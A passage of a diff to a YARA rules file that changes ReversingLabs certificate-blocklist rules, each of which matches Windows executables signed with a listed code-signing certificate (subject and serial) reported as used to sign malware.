-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "United Systems Technology, Inc." and ( pe.signatures [ i ] . serial == "00:d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" or pe.signatures [ i ] . serial == "d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" ) and 1341273600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wellpro Impact Solutions Oy" and pe.signatures [ i ] . serial == "05:bb:16:2f:6e:fe:85:2b:7b:d4:71:2f:d7:37:a6:1e" and 1628726400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "befb8867-37d6-5b0a-9801-c069b92f8edc"
+		id = "f81697ca-e49a-5a3d-9e0f-6192159e098b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15134-L15150"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9222-L9238"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bc097e97c1c4c4a71cbf66be811636fecfa23682cb2cc47ab1fcd680a646fb14"
+		logic_hash = "e922bb850b7c5c70db80e6a2b99310eac48d3b10b94a7259899facd681916bfa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27221,21 +49615,21 @@ rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RDCTO Ltd" and pe.signatures [ i ] . serial == "20:27:02" and 1087391361 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and pe.signatures [ i ] . serial == "61:71:99:0b:a1:c8:e7:10:49:eb:b2:96:a3:5b:d1:60" and 1620000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b81466f-3eb1-5c12-8878-9257dde968fb"
+		id = "7d112cb8-a29f-5560-9c3c-cd8891623d96"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15152-L15168"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9240-L9256"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e2a2e231914f166410580a42ca9d4aac18c5cba94d1f11d22e7acd6d375851d8"
+		logic_hash = "241fe5a9f233fa36a665d22b38fd360bee21bc9832c15ac9c9d9b17adc3bb306"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27245,21 +49639,21 @@ rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "36:9a:02:e5:d9:0b:26:49:04:0e:7f:87" and 1479094204 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCH CONSULTANTS LTD" and pe.signatures [ i ] . serial == "21:14:ca:3b:d2:af:d6:3d:7f:a2:9d:74:49:92:b0:43" and 1625097600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "510ab702-103b-5863-ac9a-46a917879e72"
+		id = "dd6dca76-ff5b-51a8-9318-20a88eb44ffb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15170-L15186"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9258-L9274"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "30998e3f5299a37cdee83b1232249b84dbb3c154ef99237da5ce1b16f9db5da3"
+		logic_hash = "7ba7f69514230fe636efc0a12fb9ac489a5a80ca1f5bcdb050dd30ee8f69659c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27269,21 +49663,21 @@ rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "60:49:70:70:ff:4a:83:bc:87:bd:ea:24:da:5b:43:1d" and 1477008000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Solar LLC" and pe.signatures [ i ] . serial == "6a:aa:62:20:8a:3a:78:bf:ac:14:43:00:7d:03:1e:61" and 1608163200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5eaac242-ca22-5c73-9027-308d351080bf"
+		id = "e6914a29-f6f7-56fc-8606-95666d31cf33"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15188-L15204"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9276-L9292"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f76d21e0ae2cf9b28825c813fc509d533c10aba38f8f0c2884365047c1272c1f"
+		logic_hash = "22b344b8befc00b0154d225603c81c6058399770f54cb6a09d0f7908c5c8188c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27293,21 +49687,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Coulomb Limited" and pe.signatures [ i ] . serial == "0a:33:3e" and 1052750648 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB9\\x9D\\xE6\\xB1\\x9F\\xE5\\xAE\\x8F\\xE5\\x9B\\xBE\\xE6\\x97\\xA0\\xE5\\xBF\\xA7\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "09:45:0b:8f:73:ea:43:e3:9d:2c:dd:56:04:9d:be:40" and 1561602110 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "774e28f7-46ba-533d-a73c-00d2536c7d2b"
+		id = "7bd6616b-fef7-56aa-a78a-606601afa4f3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15206-L15222"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9294-L9310"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "776402fc3a7de4843373bc1981f965fe9c2a9f1fe2374b142a96952fd05a591b"
+		logic_hash = "8f8a5e3457c05c5e70e33041c5b0b971cf8f19313d47055fd760ed17d94c8794"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27317,21 +49711,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D and D Internet Services" and pe.signatures [ i ] . serial == "1c:b6:51:9b:25:28:d0:06:d1:da:98:71:53:da:d2:b3" and 1012780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0e:fd:9b:d4:b4:28:1c:65:22:d9:60:11:df:46:c9:c4" and 1586249095 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "606749dc-f4ef-526a-8583-486401866759"
+		id = "d5e3d85b-cc4e-5522-8558-f2703c38c4e6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15224-L15240"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9312-L9328"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "67c9fd92681d6dd1172509113e167e74e07f1f86fd62456758b3e3930180b528"
+		logic_hash = "d18a479f07f2bdb890437e2bcb0213abdfb0eb684cdaf17c5eb0583039f2edb4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27341,21 +49735,21 @@ rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "62:1e:69:6c:3a:63:71:e7:7a:67:8c:bf:0e:e3:4a:b2" and 1467072000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0d:d7:d4:a7:85:99:05:84:d8:c0:83:76:59:17:32:72" and 1586249095 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "333a0901-21e7-5b4a-8daa-6a04fc2c4e86"
+		id = "969e05a1-8ae1-5ea6-9607-5bf164f34e7b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15242-L15258"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9330-L9346"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "54ca9b19adfc9357a3fb74f0670ad929319c4d06a7de7ae400f8285a31052276"
+		logic_hash = "32eea2a436f386ef44a00ef72be8be7d4070b02f84ba71c7ee1ca407fddce8ec"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27365,21 +49759,21 @@ rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Web Nexus d.o.o." and pe.signatures [ i ] . serial == "21:b9:91" and 1125477041 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:59:d4:65:80:f0:39:af:2c:4a:b6:ba:0f:fe:d1:97" and 1585108595 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8c362133-a30f-599d-88e0-a1448433178a"
+		id = "0c306a1f-e810-5988-a44c-964b6a67c918"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15260-L15276"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9348-L9364"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a2d04275b9fe37308c8f1dca75f4cc3c4a8985930f901e1f46e3ddc2977eea32"
+		logic_hash = "001556c31cfb0d94978adc48dc0d24c83666512348c65508975cc9e1a119aeae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27389,21 +49783,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1c:c3:7d:e5:db:ed:09:7f:98:f5:6d:bc" and 1476693977 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "04:48:ec:8d:26:59:7f:99:91:21:38:50:0c:c4:1c:1b" and 1585108595 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9938b4c5-4a2b-5f4a-92a0-28c3519b1ed3"
+		id = "2be3a0d2-2c6a-5c66-856a-d3a70a490ba3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15278-L15294"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9366-L9382"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "28f71c0572e769d4a0cb289071912bc79cddfd98a3a8161c5400c7bee7090bf5"
+		logic_hash = "52027548e20c819e73ea5e9afd87faaca4498bc39e54dd30ad99a24e3ace57fd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27413,21 +49807,21 @@ rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wei Liu" and pe.signatures [ i ] . serial == "50:f6:6a:b0:d7:ed:19:b6:9d:48:f6:35:e6:95:72:fa" and 1467158400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE4\\xB8\\x9C\\xE6\\xB9\\x96\\xE6\\x96\\xB0\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE5\\xBC\\x80\\xE5\\x8F\\x91\\xE5\\x8C\\xBA" and pe.signatures [ i ] . serial == "01:08:cb:ae:e6:07:28:f5:bf:06:e4:5a:56:d6:f1:70" and 1605680260 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7609083d-145b-5594-a04b-72c2862873eb"
+		id = "48162554-a95b-5cd3-9bbb-bcf6a1d96592"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15296-L15312"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9384-L9400"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "63d4c1aaafdf6de14d0ae78035644cf6b0fefab8b0063d2566ca38af9f9498d2"
+		logic_hash = "ed3a81231f93f9d2ae462481503ba37072c3800dd1379baae11737f093a27af1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27437,21 +49831,21 @@ rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "11:21:2f:50:28:36:a7:84:75:21:60:35:1d:ef:b1:36:cf:09" and 1463726573 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE5\\x86\\x85\\xE7\\x91\\x9F\\xE6\\x96\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:8d:56:a1:21:53:e8:b5:c7:4c:69:bf:f6:5c:be:3f" and 1605680260 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4e17aed7-fd76-549f-bcf7-84c97efc44e4"
+		id = "ac5d29ef-fd52-536b-bcbc-44433dda8a21"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15314-L15330"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9402-L9418"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "917f324cbe91718efc9b2f41ef947fa8f1a501dde319936774d702d57b1e6b37"
+		logic_hash = "49000f3a3ce1ad9aef87162d7527b8f062e0aa12276b82c7335f0ccc14b7d38a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27461,21 +49855,21 @@ rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prince city music bar" and pe.signatures [ i ] . serial == "2c:16:be:9a:7c:e2:a2:3a:b7:a4:b4:eb:7d:a3:40:0c" and 1371081600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "06:0d:94:e2:cc:ae:84:53:66:54:d9:da:f3:9f:ef:1e" and 1627948800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "218543f3-298f-5038-8fa9-3abeda9e4d8f"
+		id = "614f88ca-183a-548b-99f1-30cf4c4027ce"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15332-L15348"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9420-L9436"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b348c502aeae036f6d17283260ed4479427f89c8c25f2b6d59e137e90694dbe4"
+		logic_hash = "6a498fd30c611976e9aad2f9b85b13c3c29246582cdfefc800615db88e40dac2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27485,21 +49879,21 @@ rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMS INTERACTIVE MEDIA SOLUTIONS" and pe.signatures [ i ] . serial == "22:ac:ca:d2:35:fb:1a:c7:42:2e:be:5e:a7:ac:9b:c5" and 1019001600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" and 1629158400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e1834597-4e45-5866-97f4-e00c79190930"
+		id = "34594a57-f9fd-5b9d-afb6-691be33da9b5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15350-L15366"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9438-L9454"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "78ede4b02cb1b07500cd0c4f1f33da598938940d0f58430edda00d79b19b16a5"
+		logic_hash = "d3ce83fb0497c533a5474d46300c341677ec243686723783798bfbaec4f6e369"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27509,21 +49903,21 @@ rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "4d:29:75:7c:4f:bf:c3:2b:97:09:1d:96:e3:72:30:02" and 1474848000 <= pe.signatures [ i ] . not_after )
